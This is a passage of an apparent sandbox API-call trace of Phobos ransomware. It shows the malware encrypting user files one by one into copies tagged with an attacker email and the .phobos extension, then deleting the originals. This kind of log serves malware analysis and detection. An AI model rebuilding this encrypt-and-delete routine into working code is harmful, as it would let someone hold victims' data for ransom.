hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.430] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1920) returned 1 [0190.430] CloseHandle (hObject=0x134) returned 1 [0190.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg")) returned 0x2020 [0190.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.431] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.431] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.431] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.431] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.431] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x780, lpOverlapped=0x0) returned 1 [0190.445] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x790, dwBufLen=0x790 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x790) returned 1 [0190.445] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x790, lpOverlapped=0x0) returned 1 [0190.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0190.446] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.446] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.446] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.446] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.446] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.446] CloseHandle (hObject=0x134) returned 1 [0190.446] CloseHandle (hObject=0x194) returned 1 [0190.447] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg")) returned 1 [0190.447] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.448] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=4734) returned 1 [0190.448] CloseHandle (hObject=0x194) returned 1 [0190.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg")) returned 0x2020 [0190.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.448] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.448] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.449] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.449] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.449] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x127e, lpOverlapped=0x0) returned 1 [0190.459] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1280, dwBufLen=0x1280 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1280) returned 1 [0190.459] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1280, lpOverlapped=0x0) returned 1 [0190.460] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0190.460] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.460] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0190.460] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.460] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0190.460] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.460] CloseHandle (hObject=0x194) returned 1 [0190.460] CloseHandle (hObject=0x134) returned 1 [0190.460] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shadesofblue.jpg")) returned 1 [0190.461] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.461] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=232) returned 1 [0190.461] CloseHandle (hObject=0x134) returned 1 [0190.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm")) returned 0x2020 [0190.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0190.462] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.462] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.462] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.462] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.462] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe8, lpOverlapped=0x0) returned 1 [0190.463] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0190.463] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0190.464] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0190.464] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.464] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.464] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.464] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.464] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.464] CloseHandle (hObject=0x134) returned 1 [0190.464] CloseHandle (hObject=0x194) returned 1 [0190.464] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Soft Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\soft blue.htm")) returned 1 [0190.465] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.508] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10569) returned 1 [0190.508] CloseHandle (hObject=0xb8) returned 1 [0190.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg")) returned 0x2020 [0190.508] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.508] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.508] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.516] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.516] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.516] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2949, lpOverlapped=0x0) returned 1 [0190.571] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2950, dwBufLen=0x2950 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2950) returned 1 [0190.571] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2950, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2950, lpOverlapped=0x0) returned 1 [0190.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0190.572] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.572] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.572] CryptDestroyKey (hKey=0xa32de8) returned 1 [0190.572] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.572] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.572] CloseHandle (hObject=0xb8) returned 1 [0190.572] CloseHandle (hObject=0xac) returned 1 [0190.572] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\SoftBlue.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\softblue.jpg")) returned 1 [0190.573] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.577] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=498) returned 1 [0190.577] CloseHandle (hObject=0xac) returned 1 [0190.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd")) returned 0x2020 [0190.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.578] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.578] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.579] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.579] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.579] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f2, lpOverlapped=0x0) returned 1 [0190.580] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200, dwBufLen=0x200 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200) returned 1 [0190.580] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x200, lpOverlapped=0x0) returned 1 [0190.581] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0190.581] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.581] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.581] CryptDestroyKey (hKey=0xa32de8) returned 1 [0190.581] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.581] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.581] CloseHandle (hObject=0xac) returned 1 [0190.581] CloseHandle (hObject=0xb8) returned 1 [0190.582] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.dtd")) returned 1 [0190.583] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows media\\12.0\\wmsdkns.xml"), dwDesiredAccess=0x80000000, 